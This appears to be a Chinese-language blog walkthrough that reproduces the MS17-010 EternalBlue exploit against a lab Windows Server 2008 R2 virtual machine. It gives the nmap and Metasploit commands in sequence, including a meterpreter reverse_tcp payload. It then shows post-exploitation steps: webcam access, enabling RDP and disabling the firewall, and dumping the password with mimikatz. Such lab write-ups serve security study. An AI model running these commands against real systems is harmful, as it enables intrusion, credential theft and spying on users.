php ms17-010,PJzhang:ms17-010永恒之蓝漏洞在windows 2008R2中的复现

猫宁!!!

参考:

“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限,危害极大。

微软的漏洞2个漏洞公告

windows 2008R2镜像从itellme站点获取,种类齐全,比较干净。

php ms17-010,PJzhang:ms17-010永恒之蓝漏洞在windows 2008R2中的复现_第1张图片

记得进行新建,建立系统保留分区哦,用于存放系统引导文件,类似于centos7的/boot分区,可以避免系统无法正常启动。

php ms17-010,PJzhang:ms17-010永恒之蓝漏洞在windows 2008R2中的复现_第2张图片

虚拟机中的Windows 2008 R2一定要设置为网卡桥接模式

ip是192.168.100.27,先用nmap扫描一下有没有永恒之蓝漏洞存在,扫描脚本在/usr/share/nmap/scripts/

php ms17-010,PJzhang:ms17-010永恒之蓝漏洞在windows 2008R2中的复现_第3张图片

nmap --script smb-vuln-ms17-010.nse 192.168.100.27,表明开启了445端口,存在漏洞。

php ms17-010,PJzhang:ms17-010永恒之蓝漏洞在windows 2008R2中的复现_第4张图片

msfconsole,启动MSF

search ms17_010

php ms17-010,PJzhang:ms17-010永恒之蓝漏洞在windows 2008R2中的复现_第5张图片

use auxiliary/scanner/smb/smb_ms17_010,使用POC进行扫描

set RHOST 192.168.100.27

run

证实存在漏洞

php ms17-010,PJzhang:ms17-010永恒之蓝漏洞在windows 2008R2中的复现_第6张图片

use exploit/windows/smb/ms17_010_eternalblue

set RHOST 192.168.100.27

run

竟然把服务器给打重启了,没有连接上去

php ms17-010,PJzhang:ms17-010永恒之蓝漏洞在windows 2008R2中的复现_第7张图片

php ms17-010,PJzhang:ms17-010永恒之蓝漏洞在windows 2008R2中的复现_第8张图片

show payloads,看一下更多种类的payload,46个

php ms17-010,PJzhang:ms17-010永恒之蓝漏洞在windows 2008R2中的复现_第9张图片

show targets,显示适用的目标

php ms17-010,PJzhang:ms17-010永恒之蓝漏洞在windows 2008R2中的复现_第10张图片

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp,这个payload非常有助于后期的植入后门进行权限维持。

set RHOST 192.168.100.27

run

成功进入服务器系统

php ms17-010,PJzhang:ms17-010永恒之蓝漏洞在windows 2008R2中的复现_第11张图片

php ms17-010,PJzhang:ms17-010永恒之蓝漏洞在windows 2008R2中的复现_第12张图片

screenshot,截屏

php ms17-010,PJzhang:ms17-010永恒之蓝漏洞在windows 2008R2中的复现_第13张图片

webcam_scream,可以开启摄像头

run post/windows/manage/enable_rdp,开启远程桌面并关闭防火墙

php ms17-010,PJzhang:ms17-010永恒之蓝漏洞在windows 2008R2中的复现_第14张图片

php ms17-010,PJzhang:ms17-010永恒之蓝漏洞在windows 2008R2中的复现_第15张图片

shell,直接进入系统

php ms17-010,PJzhang:ms17-010永恒之蓝漏洞在windows 2008R2中的复现_第16张图片

load mimikatz,加载密码读取工具

wdigest,成功获取我的密码

php ms17-010,PJzhang:ms17-010永恒之蓝漏洞在windows 2008R2中的复现_第17张图片

rdesktop 192.168.100.27 -u Administrator -p 111aaabbb!!!

远程连接服务器就好了

arp查看内网情形

php ms17-010,PJzhang:ms17-010永恒之蓝漏洞在windows 2008R2中的复现_第18张图片

获得当前木马进程,getid

d9e574a3930fa335e85bb012eb070e28.png

ps查看

php ms17-010,PJzhang:ms17-010永恒之蓝漏洞在windows 2008R2中的复现_第19张图片

获取用户的身份和权限

php ms17-010,PJzhang:ms17-010永恒之蓝漏洞在windows 2008R2中的复现_第20张图片

判断服务器是不是被人在使用

3335402068f98b36b1156cc4d3c36043.png

run和bgrun,有大量的帮助文件

php ms17-010,PJzhang:ms17-010永恒之蓝漏洞在windows 2008R2中的复现_第21张图片

sysinfo,显示计算机信息

php ms17-010,PJzhang:ms17-010永恒之蓝漏洞在windows 2008R2中的复现_第22张图片

你可能感兴趣的:(php,ms17-010)